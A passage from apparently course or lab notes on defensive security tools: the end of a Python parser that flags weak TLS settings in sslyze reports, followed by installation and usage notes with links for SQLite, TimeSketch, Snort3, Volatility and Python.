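                    findings.append(f"{proto}: weak DH group ({dh.group(1)} bits): {suite}")
                if any(tag in suite for tag in LEGACY_CIPHERS):
                    findings.append(f"{proto}: legacy cipher: {suite}")
        elif name == "Certificates Information":
            cert = key_values(lines)
            if cert.get("Signature Algorithm", "").lower() == "sha1":
                findings.append("certificate signed with SHA-1")
            size = cert.get("Key Size", "")
            if size.isdigit() and int(size) < 2048:
                findings.append(f"RSA key size {size} is below 2048 bits")
            if cert.get("Hostname Validation", "").startswith("FAILED"):
                findings.append("certificate does not match the hostname")
            if any("self signed" in v for v in cert.values()):
                findings.append("certificate is self-signed (not trusted by any store)")
    return findings
```

Running it on a report saved with `sslyze --regular host:443 > report.txt` gives the same list for a real server; an empty list for the www.ubs.com scan above would be expected apart from the renegotiation item, which this parser does not cover.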


D. SQLite

=========


1. Installation

- GNU/Linux, OSX: sqlite3

- Windows: https://sqlitebrowser.org


2. Cheat Sheet

https://www.sans.org/security-resources/posters/sqlite-pocket-reference-guide/380/download



E. TimeSketch

=============

Open Source

1. Installation

https://github.com/google/timesketch

cd /opt/timesketch

sudo docker-compose up -d

2. Test data

https://dfir.blog/solving-magnet-forensics-ctf-with-plaso-timesketch-colab/

https://drive.google.com/drive/folders/1E0lELj9NouMwSMGZCI7lXWRqYE2uQCpW


F. Snort3

=========

1. Installation

https://hub.docker.com/r/ciscotalos/snort3

1.a. Initial setup

The -v argument maps the local folder /tmp/wireshark101v2files into the Docker container, so that it is also reachable there under the path /tmp/wireshark101v2files.

sudo docker run --name snort3 -h snort3 -u snorty -w /home/snorty -d -v /tmp/wireshark101v2files:/tmp/wireshark101v2files -it ciscotalos/snort3 bash

1.b. Opening the Docker container

sudo docker exec -it snort3 bash

1.c. Running Snort

Snort applies all rules found in the folder ~/snort3/etc/rules/ to all PCAPNG files stored in the folder /tmp/wireshark101v2files.

snort -q --rule-path ~/snort3/etc/rules/ --pcap-filter "*.pcapng" --pcap-dir=/tmp/wireshark101v2files --talos

If only a single PCAP file is to be analysed, the following command can be used:

snort -q --rule-path ~/snort3/etc/rules/ --pcap-filter "*.pcapng" -r /tmp/wireshark101v2files/ethernalblue.pcapng --talos


2. Introduction Videos

https://www.snort.org/resources


G. Volatility

=============

1. Installation

https://www.volatilityfoundation.org/releases

- Windows

- OSX

- GNU/Linux

2. Cheatsheet

https://downloads.volatilityfoundation.org/releases/2.4/CheatSheet_v2.4.pdf

3. Example data

https://github.com/volatilityfoundation/volatility/wiki/Memory-Samples

4. Quiz

https://downloads.artofmemoryforensics.com//QuestionsCombined.txt

https://www.memoryanalysis.net/#!amf/cmg5


H. Python3

==========
1. Installation

https://www.jetbrains.com/de-de/pycharm/

- Windows

- OSX

- GNU/Linux

